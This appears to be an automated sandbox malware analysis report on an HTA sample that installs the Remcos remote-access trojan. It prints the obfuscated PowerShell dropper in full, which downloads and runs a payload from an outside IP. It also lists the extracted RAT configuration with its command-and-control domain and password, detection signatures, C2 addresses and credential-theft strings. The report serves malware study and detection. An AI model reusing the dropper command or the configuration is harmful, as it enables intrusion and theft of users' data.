InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline", ProcessId: 7656, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: F5 A3 53 53 9D B0 38 4A 1A F4 EC 2A 3F 9B 2F 71 68 8F 17 D1 D4 54 6E DC A6 CC 9A 91 B5 68 D6 65 BE E0 C7 FD 44 A2 FD 6C 27 38 9E A2 C6 58 9B A6 01 1F 5A B8 A8 09 69 77 1E F9 91 82 1F C9 C7 97 A7 48 B7 EC 86 C6 FD 67 C1 3B 7D 4F 0B 09 90 2F F1 4A 6E 00 27 40 92 D5 31 21 0D 62 08 B3 3F 1D 60 D5 51 7A 81 13 87 DB C2 78 7F 25 12 F5 40 DA AB 45 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6772, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B3IX49\exepath
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:32.511096+010020204251Exploit Kit Activity Detected172.67.187.200443192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:32.511096+010020204241Exploit Kit Activity Detected172.67.187.200443192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:35.200213+010020365941Malware Command and Control Activity Detected192.168.2.449739107.173.143.3114646TCP
                    2024-12-16T07:12:37.309488+010020365941Malware Command and Control Activity Detected192.168.2.449740107.173.143.3114646TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:37.593144+010028033043Unknown Traffic192.168.2.449741178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:33.462037+010028582951A Network Trojan was detected172.67.187.200443192.168.2.449738TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:04.055751+010028587951A Network Trojan was detected192.168.2.449730192.3.122.15980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-16T07:12:32.099411+010028410751Malware Command and Control Activity Detected192.168.2.449738172.67.187.200443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.htaVirustotal: Detection: 27%Perma Link
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.htaReversingLabs: Detection: 13%
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043294A
                    Source: powershell.exe, 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7b925e78-e

                    Exploits

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                    Phishing

                    barindex
                    Source: Yara matchFile source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1797357428.0000000006F65000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.pdb source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 192.3.122.159:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 107.173.143.31:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 107.173.143.31:14646
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Malware configuration extractorURLs: kelexrmcadmnnccupdated.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: kelexrmcadmnnccupdated.duckdns.org
                    Source: Yara matchFile source: 7.2.powershell.exe.6347ae0.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 107.173.143.31:14646
                    Source: global trafficHTTP traffic detected: GET /r/pBbD1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                    Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 172.67.187.200:443
                    Source: global trafficHTTP traffic detected: GET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046B7A18 URLDownloadToFileW,3_2_046B7A18
                    Source: global trafficHTTP traffic detected: GET /r/pBbD1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: kelexrmcadmnnccupdated.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simpleg
                    Source: powershell.exe, 00000003.00000002.1797663819.0000000006FD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1797357428.0000000006F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF
                    Source: powershell.exe, 00000003.00000002.1799959412.0000000007DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFLMEM
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: CasPol.exe, CasPol.exe, 0000000C.00000002.4133634036.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpUJ
